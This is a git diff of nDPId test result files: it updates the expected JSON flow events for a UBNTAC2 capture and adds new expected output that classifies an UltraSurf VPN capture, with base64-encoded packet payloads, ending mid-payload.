00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1486943504301,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1486943504301,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4hAAEARuPDAqAEB\/\/\/\/\/6dWJxEAt\/Q2AgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADepwsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdYbAAU0LjAuMA=="} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943504301,"flow_last_seen":1486943504301,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":42838,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943473817,"flow_last_seen":1486943473817,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":59772,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943494148,"flow_last_seen":1486943494148,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47746,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943463665,"flow_last_seen":1486943463665,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47871,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943483995,"flow_last_seen":1486943483995,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":52220,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943433175,"flow_last_seen":1486943433175,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":34085,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943443357,"flow_last_seen":1486943443357,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":44641,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943504301,"flow_last_seen":1486943504301,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":42838,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943453510,"flow_last_seen":1486943453510,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":55321,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943504301,"flow_last_seen":1486943504301,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":42838,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943473817,"flow_last_seen":1486943473817,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":59772,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943494148,"flow_last_seen":1486943494148,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47746,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943463665,"flow_last_seen":1486943463665,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47871,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943483995,"flow_last_seen":1486943483995,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":52220,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943433175,"flow_last_seen":1486943433175,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":34085,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943443357,"flow_last_seen":1486943443357,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":44641,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943504301,"flow_last_seen":1486943504301,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":42838,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943453510,"flow_last_seen":1486943453510,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":55321,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","packets-captured":8,"packets-processed":8,"total-skipped-flows":0,"total-l4-payload-len":1400,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1486943504301} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 8/8 @@ -41,9 +41,9 @@ ~~ total active/idle flows...: 8/8 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5876871 bytes -~~ total memory freed........: 5876871 bytes -~~ total allocations/frees...: 118142/118142 +~~ total memory allocated....: 6010505 bytes +~~ total memory freed........: 6010505 bytes +~~ total allocations/frees...: 120904/120904 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 703 chars diff --git a/test/results/ultrasurf.pcap.out b/test/results/ultrasurf.pcap.out new file mode 100644 index 000000000..cb4a18589 --- /dev/null +++ b/test/results/ultrasurf.pcap.out @@ -0,0 +1,38 @@ +00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ultrasurf.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ultrasurf.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1656652731609} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656652731609,"flow_last_seen":1656652731609,"flow_idle_time":7580000,"flow_min_l4_payload_len":2576,"flow_max_l4_payload_len":2576,"flow_tot_l4_payload_len":2576,"flow_avg_l4_payload_len":2576,"midstream":1,"thread_ts_msec":1656652731609,"l3_proto":"ip4","src_ip":"65.49.68.25","dst_ip":"10.132.0.23","src_port":50053,"dst_port":37898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +03968{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1656652731609,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2646,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":2646,"pkt_l4_len":2608,"thread_ts_msec":1656652731609,"pkt":"zBr67JUAcGlaOmiJgQAAyAgARQAKRM7tQAA3BtrhQTFEGQqEABfDhZQKC2KlCkpUkTKAEAFmmhsAAAEBCAom3sf8A1a0+8wcMEFbpDhmmW\/ro\/\/D3SORouvGcLJVns8eaTu23\/042aUVj61nN6Xm0ijnaUg+Npmao+ahS5YFWlU5gxCt1Bv2Dd8X34iKweQUI1pV18JFIZQX4tZ8BgqPMHrM3xcO0sUVX\/OJ2pP8yGrJvNpjXCDZ3sKsZ8ObIJNR5C9HtP8VqqX5BjlcTX8CqWIvl0ZBgk5WvH2JDhc248aWcjJLqPpHeFkT7LlN9WbJOIcs7fIr7w\/l\/4QosbfyzysqE5\/jPdpXVbudJyd5Co9YEs4l8Q\/6o70Ffd9ZnAxSFwa0dpQq9l84dMMc++LU4g\/5uQo7ByYovlcOyQGaJMbvwFaomPtCm2gWgqlbGVYuy1fssTPKvOwtvuxi+uQSp0x90L4yICcjWy7QquRyX6vF4Kj7bnDBXk4Yuwhy\/eBFma8pYGq3nFybEXkBIoJM5PIx+daLngl8AMAATYZytmx8fvkxAn9nAl1vSL8DDtuJzW4bIpWNuUkrrQEo1qDNWTbFKTev+4WI2s2Dq0ECsJXkOzrv7ys8hbU9zt92MomzoOYqefTDPaVuUCZTdCEQ9uujt8du7o\/jXx78zGYtv58gGSActDbLr2l16bg\/8Uk3qmgnE4b9MmARdZqn4TXakOrfI7oMcpdzvXVxR02+JkOD2SzX0V6zyWGabGkpaHNUvZKhT9p9qT+xCygM23AxUgBVWRhbJOtoeCCmB9GtvrbByAuiFwMDCxpSuPxAzaqU1CDJRf0ARgMOGGitml366m2q80qwL6szhusBMTOpH\/+lZ+4L1ssuGJ7LmGwmTwj7CD7eU0QlRuuYEYdh\/W6inXP9pJwRRn5uXzjK2UGyXSKJQgFhgjKV\/gTtslaG1kJ9wEH3bRwjXGp+ck2NQY4p+Bw8hIGicivItS9FcKEUt6XedxsZehCTx0hYNbo5lDpgelreL+du2TIrCAGAHDGERkejYlaJXbPaNGkoCdPiWIM\/wKUpngDY6o\/X+oS4sqzbyHIJrWfx\/DNsKnakfj\/2CY9hTzppyXRIIMYoyhCThF4ViWWG951XQxJX59hIiJ0P800Ff7a\/5G5VD7ycCukCJw8TO+sLeaHNh0quy2GVip7vE7h6qblNGu0Gk9cK51FTnAHXCv6Q3d4ELba6G4KCOUY3W0JffhWzAOEmTJXAEn\/AlMO2rWx\/k5N9xej0nT\/nkreUz1f1WDVQX6TVNBY\/eRFDtb+TFH+sKdpkHf7qxhfQFxyqkO3FqpeLRYLb2aGXgnvyumtFIbL1yK2alLZq7VfOIertUcgFGWCflf2oGAQMP494aoiJeNdkUmDGGagS7Z55kvWOGnhHAq7vsPk2kKAjsA1WiALpxOUCeufBXfydppP5eHVnoy28uj69BNxwot9pZUkBBYCeXDj3oFR7Gc9bpRrdMTyafPDB90bcnb3nOWmeh6KPFWxajHcXo0ahl0atfQ0xcfDpv70YkPiVHvN5anji\/jwqd+wJMI02C2CHQYt0A0sb9htNsGJTYmz+qMEhhQgck9uTTyfTQQdK6\/Wo8Rw4c2ys8Ejy8JuJwmtCvHILWdrH8t+XzmYUjHgSjqsA2HLkDPFRZ\/NnGE1jWIEHA1mz46FdQt2Rz4VpbzOBlhqXfDAGkgWEXCyxg9Xt27URhieFz2k6YtWj1FBxrzsegVYDqhgLu95Xv61CBvesoUlZ9xj6Kl4Yl3DHrSrHkP69714VHd12KjEfy7I6PDUSEKGOgsDz2k3gWEz1Vc+5H98dopHMlCP13Yfv0lgLia4AI9tg03z8EoOpAEtDjYmJC8jyZR7z8MFAqjVJ+KlRi7Va6lXMgiTy48noI4EJnp+d3YCu\/TvYdatO\/n8f0FwyP3cI7Bw1wJQYGLb8BE+1FxjfVZo1\/FCFmY5z5t2vZ1fLUc8VgQCCrdPI9Reqj0rAEBhJQzYhyyrI5sO+d0uUiZm1ZjMrsAuR1R+D8ViDPDKJgNTF+lFzmzRvVhWOwiVB62wQx0H1nuzBWVrJnVTyu3Td+HivoL56Fmw46FaLO5cqZKJ4kdrfcT7dOr5SBNdiyjnF7hS41D6qjd1GwoYClOmY65UzGvO\/LpJXnZXNNzcmlebgMFy797BQ5WUmd7VC5FdTGCC8DMqElgFA+rp3WoHjwFyoua2tPfKAEOcMjf\/DXXePwU3Ik4UHmQADTzoJAa9I3MJkafNrUiyVVonoJubGqfmrjkZSA4gDie37sGxEUI86ocE60tLrdZB+SyKA8DHTfOJ4ywPWXCzMMHVfSQPr7V\/TcVQus\/74nuldXt48tcQWezCEyjrk4wEup0Xxil5tfRt81R5SKnXiLTQKHEZIf0HqSXIESqul3tuehmW4c9Q1wxJPZqqhjadeeubZ0gIjhZ9hs9B\/6aDfWtslbETpt0Jbd\/Ri0xqEdLzsqFyIafwtncy88mYnLcalIh0rBtSJuU\/LhKGCkVIE+gUPPF1DbTYZY4YKEaeb+2qo\/\/JDj6zwXltjrJPllzgJKQNGUCykc5KZO1hlo311el8xzVEOheb4BzRB9rrUaDmjaCVi8CyuEyMO5b2YxxWHzBzuZCfmdbLRqSQLyu+LSzVRqFA+T79T7kHNu3xGMSCuKVSsG2pREebnblNVGkCfubEdGKnPL686GbKWglEv7v2CfHncHfVZct\/s0hHAbjxQUdnfLXoTISdI7+bsxXb+ra8Q\/1RtrRBVzu+48UJKnUfoIM1auofVab2EM52OgI1cJXu8rWam94puZzFKEWGHN5jrPhx\/1njYeBqUbgiSNKRjjW+fz8xMBFQ5gSSCk0oalrdEbE7BnRoIdN\/vRg9D\/N51B7MdkbJ2Gmv55poGFAMgIExvo2B\/JlYaCIHgXg41f0\/LPeqrMcFhe2j5UYCpb3n2IzOKezh\/TS0GI0iMwrY1GP7aVptjhYXhhys7MA9TMX9mjk30oA5Li3Yeg25blNJqeDxKu+vxwlNbxqOKs86fBSxzrYDDpnNu5QdAQ7sboEki75xxiMB7G2qxumkThEE3WMNP1TP2cyPa+KzTwAEUydo7dmB7r1BYVlH445Zqui\/gQ9B7FCwh5ykQiRlEVepOqNbbaYU6jrc3JQmu9yNVQ516c7KEY3PmTJGfIomYYQCg0xQ64qJbX+Ng2D40mseTOcV\/nfh\/lZ1gI1tQQr6VxcSHohyQ0owuuvE7GS\/s9KhqIZNKrqD7fH3CftARHmTYUxtD5t+c+oO0QyPgfXcmsUaQ277fzvTac55sC8LTxTlb6qQ6lTQ9Jxj5AhKLanf25vF3ivpTZoHcf\/UbFC7yAm1PT5k8IxbUybglXXWOr+hDrIncmBDz99Gq0DNEyl2Sk\/khhOFsvG2taZ4rfI\/Iq+r72y5uXdniCSx0ABH9OlSRvpo\/6aASUseGq305nqAhb9HZEY9zmIB4WBYmNdv2m2FQvjwfqskoI3NcL8wSS92+WJiP"} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656652731609,"flow_last_seen":1656652731609,"flow_idle_time":7580000,"flow_min_l4_payload_len":2576,"flow_max_l4_payload_len":2576,"flow_tot_l4_payload_len":2576,"flow_avg_l4_payload_len":2576,"midstream":1,"thread_ts_msec":1656652731609,"l3_proto":"ip4","src_ip":"65.49.68.25","dst_ip":"10.132.0.23","src_port":50053,"dst_port":37898,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"UltraSurf","breed":"Acceptable","category":"VPN"}} +03963{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1656652731609,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2646,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":2646,"pkt_l4_len":2608,"thread_ts_msec":1656652731609,"pkt":"zBr67JUAcGlaOmiJgQAAyAgARQAKRM7vQAA3BtrfQTFEGQqEABfDhZQKC2ONCUpUkTKAEAFmmhsAAAEBCAom3sgHA1a0\/YkZzIRfJcoGEDhjun+5RWZFRHORheFaka9qWEEqwSnKRQ8+fGAhhFa7EN5cpLsXBaX2yHZz8DtP4L0FIaDBHwFd5rA4GP5cmI7bfwLgg4FVeGP7SjUTC6qb+HQHzgd9GKJejKikQgtNuMoyW+WltSykS7MMuwC9XmFm880JdkonHY1odOp0bZesqC0Ef58K3CfEAwAV1rHerMtEb3ZHcVOr9dSu4VHvVdRPp+8WfCOtT114DN9xODhN5xizXNsKGb1Vqn77M3rN9osNOzf3tytH8Pevd1aIgf3Sm6YXA7VR5D7dvmhs0FN4QC+LDtkE\/6thA0uo\/lnZqMEIHcwUsGe918WbIwSGOk2MJbaAbJZUODyOfxe+T03WsJGCGLuDQ0m7AsMClrqgh8OHbm5U9HMCsMr4h4pvEhR0z2I+R7A\/GAWfQ1Lv84asTQ\/KcjVoTGNO\/qR9qnBDPz02vpUg0t1qIn5OZjHUJc1XlP7bcvV\/wKw3OfG2mX63GGvc7i7QZES09OVvvvQOx27EiD1xANcAMElPBG4AZ\/1ImDDO55WnYWPfINUR0Htt3CDZHS99b7xjoML0TE0baQJ3Jm38p3DdfsEGrsmIokmWO1TpdGRxB4MJLY3wn7Tw4tqDNqBMVruqsIN3XOP1je5K4jtfip7MN5mhXqQwq26JbXu4RN0QZgBwifB\/DFQoswvG8No+jWGMXSh9v0kJl9fw8bhx9lZpA3tQmLgRL3sOqJAHaqHBZRkJhuHh+Rjm\/6hTfFQ00ehtauLThf9ezdb2uY49gvz2DGebsNmTjFsOx+X4R9hsdpnezkh4aEpX5uL1bXi1H6uS64VjoFNEDHQpZ+3uZrYCmJilgBV0bv0nVghQl4kU33Pf7GIoPZuXhIQfS9VrHsdHbZpH1PU8M\/9PRmRmYlmeapu7XEZp4CzDGYPDSedJ8vQLqPyHzVwGcjHckBVdpjNiPAG5UPQoZ3wCl\/PxEywufemrmfmR\/5AqOpW8\/Wur6zMxw5YPRRe\/bygJ0G9Yqw0LVPvEBxGwFY9uVVI6IGaHAasiMKQLbkze7bdXM6QNfYFDnbbaxoOEV8QDh7YIhuz4gfbAW6eyQbJT2jQKjEHkd0tMaupNho4gKsMUwsj4nZlzTYJVJpDMcLimISegAqBKQ4i8foUUKiadz6eosf+e\/Jex37VfE+krt3zlcpISr8HTnFM1USFF0+9ct3a5KjyNHIWXBbdEjluidEueiRiWyxf4cTH4FbCD2xO9GNRkq9QZppurtJaFbRjXCrw9UUutzbcN9EQ4Cq+gKBSyYXwmUbkSGOLO9rE323nvwyvDcYVdrUsP+BGDklMzvNUHuJnRFouZ1R0WCXxlJrCNrMkgI+iuTt0BJzGXzfEkqc7fmNoiossOF4BZK08wWnsMWJPMsI5Aw3iU49xeiNCj74DW2jR92gY79iEsFrre1ny3NbSwl8EGB091wIYQyL7Ho3Xf3P3gT7nJkJZVIupHy1AL3OnXFLu0aQ9jZogZz0sFxzcPAzim0\/TD+aEJKEn3h1ZCM0dvkLQLeFEGKVhxypzfJLDO0hydYwloEETx3qJaVHzqs8Wq+SgnnsMzDPiMy\/H9mXbpWFOmZUY8c+RgPNNwEPY9sWGgREkghLZgVI4BmbR+1He8AIC\/Jqb6\/fZGK9Su8InqtBz4VDwmCvVjB5VmwRYgEff9Co9KEAKioF+rxsp7jx4CUT\/dUpBgwtPw1AAqwXhQ\/uIBWqnOLtB+sJapVDGqCd6YbeW67lUJtDoMU8VaKm8fednX12fDvla7u1M+CXOyIf\/4rq46zKsHemwKXMSG27KxCoqvfpu2RFyDoNiwIkywHe+mu0KXU6r0uKXXuXHjcqE1XT+Ol42P4hE1aTwsVJT\/aLRIVQDwKL6IhfLinh4zf9x0O\/I\/C1GeMvABe16jJTVzGkcz49endJCMetsRgtWR7oSOwEn5bVIocg8jZsCjdrwEvd6kjZWMsRgHhtbLq+aU27mgxUfacXWiiGTsT33DZFYnj2Gbfgh1MUmZNuxbwGQK74YsSlD8+37pnUDCdBxPu+Gf64VQKHxJ9RtZ7tBvjcOGhEiQQM2Bqm9+kC5dGL6whXOTdBD0aHE3e3jNhysBJXeznMxXLuH5BpQBNhY+pGCD36HH\/gl2POk5EvjD5emciTPfEvMoX\/pO1twUe